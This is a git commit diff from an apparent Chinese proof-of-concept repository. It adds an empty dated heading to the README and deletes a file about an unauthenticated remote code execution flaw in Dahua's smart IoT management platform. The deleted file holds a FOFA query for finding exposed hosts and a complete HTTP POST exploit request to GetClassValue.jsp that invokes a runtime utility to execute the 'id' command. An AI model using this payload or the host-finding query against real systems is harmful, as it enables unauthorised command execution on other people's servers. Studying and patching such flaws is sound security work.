This commit is contained in:
wy876 2025-01-07 12:34:29 +08:00
parent d6a2a1e8cf
commit 48cef42900
2 changed files with 5 additions and 29 deletions

View File

@ -47,6 +47,10 @@
</div>
## 2025.01.11 新增漏洞
-
## 2025.01.04 新增漏洞
- [Guns后台任意文件上传漏洞](./Guns/Guns后台任意文件上传漏洞.md)
@ -1670,6 +1674,6 @@
## 免责声明
由于传播、利用本文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。所涉及工具来自网络,安全性自测。
**本项目所涉及的POC仅供学习任何人不得将其用于非法用途和盈利不得将其用于非授权渗透测试否则后果自行承担与本项目无关。使用本项目前请先阅读法律法规**
[![](https://starchart.cc/wy876/POC.svg)](https://starchart.cc/wy876/POC)

View File

@ -1,28 +0,0 @@
# 大华智能物联综合管理平台GetClassValue.jsp远程代码执行漏洞
大华智能物联综合管理平台GetClassValue.jsp远程代码执行漏洞攻击者可以不需要授权远程执行命令。
## fofa
```javascript
app="dahua-智能物联综合管理平台"
```
## poc
```javascript
POST /evo-apigw/admin/API/Developer/GetClassValue.jsp HTTP/1.1
Host:
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
{
"data": {
"clazzName": "com.dahua.admin.util.RuntimeUtil",
"methodName": "syncexecReturnInputStream",
"fieldName": ["id"]
}
}
```
![image-20250102172533617](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501021725804.png)